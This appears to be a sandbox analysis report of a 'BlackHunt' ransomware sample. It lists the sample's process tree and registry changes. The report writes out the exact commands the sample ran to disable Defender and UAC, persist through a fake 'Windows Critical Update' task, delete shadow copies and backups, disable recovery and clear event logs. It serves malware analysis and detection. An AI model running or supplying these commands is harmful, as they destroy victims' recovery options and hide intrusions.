description pid Process procid_target PID 3080 wrote to memory of 4808 3080 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe 89 PID 3080 wrote to memory of 4808 3080 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe 89 PID 3080 wrote to memory of 1332 3080 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe 91 PID 3080 wrote to memory of 1332 3080 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe 91 PID 3080 wrote to memory of 2924 3080 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe 93 PID 3080 wrote to memory of 2924 3080 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe 93 PID 3080 wrote to memory of 776 3080 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe 95 PID 3080 wrote to memory of 776 3080 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe 95 PID 3080 wrote to memory of 4636 3080 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe 97 PID 3080 wrote to memory of 4636 3080 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe 97 PID 4808 wrote to memory of 1356 4808 cmd.exe 100 PID 4808 wrote to memory of 1356 4808 cmd.exe 100 PID 1332 wrote to memory of 1056 1332 cmd.exe 99 PID 1332 wrote to memory of 1056 1332 cmd.exe 99 PID 776 wrote to memory of 4388 776 cmd.exe 102 PID 776 wrote to memory of 4388 776 cmd.exe 102 PID 2924 wrote to memory of 2512 2924 cmd.exe 101 PID 2924 wrote to memory of 2512 2924 cmd.exe 101 PID 3080 wrote to memory of 3928 3080 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe 103 PID 3080 wrote to memory of 3928 3080 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe 103 PID 3080 wrote to memory of 5024 3080 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe 105 PID 3080 wrote to memory of 5024 3080 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe 105 PID 3080 wrote to memory of 2344 3080 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe 107 PID 3080 wrote to memory of 2344 3080 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe 107 PID 3080 wrote to memory of 3924 3080 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe 108 PID 3080 wrote to memory of 3924 3080 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe 108 PID 4636 wrote to memory of 1152 4636 cmd.exe 109 PID 4636 wrote to memory of 1152 4636 cmd.exe 109 PID 3080 wrote to memory of 2952 3080 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe 187 PID 3080 wrote to memory of 2952 3080 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe 187 PID 3080 wrote to memory of 3456 3080 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe 114 PID 3080 wrote to memory of 3456 3080 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe 114 PID 3080 wrote to memory of 2224 3080 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe 117 PID 3080 wrote to memory of 2224 3080 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe 117 PID 3080 wrote to memory of 756 3080 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe 192 PID 3080 wrote to memory of 756 3080 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe 192 PID 3928 wrote to memory of 2944 3928 cmd.exe 118 PID 3928 wrote to memory of 2944 3928 cmd.exe 118 PID 5024 wrote to memory of 1996 5024 cmd.exe 121 PID 5024 wrote to memory of 1996 5024 cmd.exe 121 PID 3080 wrote to memory of 5108 3080 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe 122 PID 3080 wrote to memory of 5108 3080 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe 122 PID 3924 wrote to memory of 1452 3924 cmd.exe 179 PID 3924 wrote to memory of 1452 3924 cmd.exe 179 PID 3080 wrote to memory of 952 3080 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe 126 PID 3080 wrote to memory of 952 3080 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe 126 PID 3080 wrote to memory of 3840 3080 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe 127 PID 3080 wrote to memory of 3840 3080 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe 127 PID 2952 wrote to memory of 4032 2952 cmd.exe 125 PID 2952 wrote to memory of 4032 2952 cmd.exe 125 PID 3456 wrote to memory of 4736 3456 cmd.exe 130 PID 3456 wrote to memory of 4736 3456 cmd.exe 130 PID 2224 wrote to memory of 4004 2224 cmd.exe 131 PID 2224 wrote to memory of 4004 2224 cmd.exe 131 PID 3080 wrote to memory of 3772 3080 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe 132 PID 3080 wrote to memory of 3772 3080 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe 132 PID 756 wrote to memory of 4000 756 cmd.exe 135 PID 756 wrote to memory of 4000 756 cmd.exe 135 PID 3080 wrote to memory of 1912 3080 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe 136 PID 3080 wrote to memory of 1912 3080 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe 136 PID 2344 wrote to memory of 1564 2344 cmd.exe 188 PID 2344 wrote to memory of 1564 2344 cmd.exe 188 PID 3080 wrote to memory of 3192 3080 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe 140 PID 3080 wrote to memory of 3192 3080 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe 140 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe"C:\Users\Admin\AppData\Local\Temp\063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe"1⤵
- UAC bypass
- Checks computer location settings
- Checks whether UAC is enabled
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:3080 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:4808 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f3⤵
- Modifies registry class
PID:1356
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:1332 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:1056
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2924 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f3⤵
- Modifies registry class
PID:2512
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:776 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:4388
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f2⤵
- Suspicious use of WriteProcessMemory
PID:4636 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f3⤵
- Adds Run key to start application
PID:1152
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:3928 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f3⤵PID:2944
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:5024 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:1996
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f2⤵
- Suspicious use of WriteProcessMemory
PID:2344 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f3⤵PID:1564
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:3924 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f3⤵PID:1452
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f2⤵PID:2952
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f3⤵PID:4032
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:3456 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f3⤵PID:4736
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:2224 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f3⤵PID:4004
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f2⤵PID:756
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f3⤵PID:4000
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f2⤵PID:5108
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f3⤵PID:4072
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f2⤵PID:952
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f3⤵PID:2440
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f2⤵PID:3840
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f3⤵PID:2728
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵PID:3772
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f3⤵PID:4612
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:1912
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:2232
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵PID:3192
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f3⤵PID:3940
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:264
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:4964
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:4024
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f3⤵PID:3008
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:4364
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f3⤵PID:704
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:4912
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f3⤵PID:2616
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵PID:1040
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f3⤵PID:3304
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:4680
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f3⤵PID:2056
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵PID:4840
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f3⤵PID:4072
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵PID:3776
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f3⤵PID:6380
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:1216
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f3⤵PID:3644
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:4652
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f3⤵PID:6328
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe" /F2⤵PID:5064
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe" /F3⤵
- Creates scheduled task(s)
PID:6744
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB2⤵PID:2292
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:996
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded2⤵PID:2520
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:6656
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded2⤵PID:2516
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded3⤵
- Interacts with shadow copies
PID:6668
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB2⤵PID:4888
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB3⤵
- Interacts with shadow copies
PID:4284
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:1452
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:6372
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:5076
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:6760
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:632
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:6772
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵
- Suspicious use of WriteProcessMemory
PID:2952 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:1564
-
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:5436
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:4376
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:7028
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵
- Suspicious use of WriteProcessMemory
PID:756 -
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:6736
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D F:\2⤵PID:10224
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D F:\3⤵
- Enumerates connected drives
PID:996
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D C:\2⤵PID:6512
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D C:\3⤵PID:4680
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D M:\2⤵PID:2472
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D M:\3⤵
- Enumerates connected drives
PID:6164
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup2⤵PID:6348
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Setup3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:8052
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System2⤵PID:7860
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl System3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:5724
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application2⤵PID:3816
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Application3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:6032
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security2⤵PID:6900
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:5680
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security /e:false2⤵PID:7896
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security /e:false3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:7176
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:4420
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:624
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:7080
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:6600
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:4364
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:4876
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:6668
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:4864
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:4884
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:4520
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:6388
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:7640
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f2⤵PID:4676
-
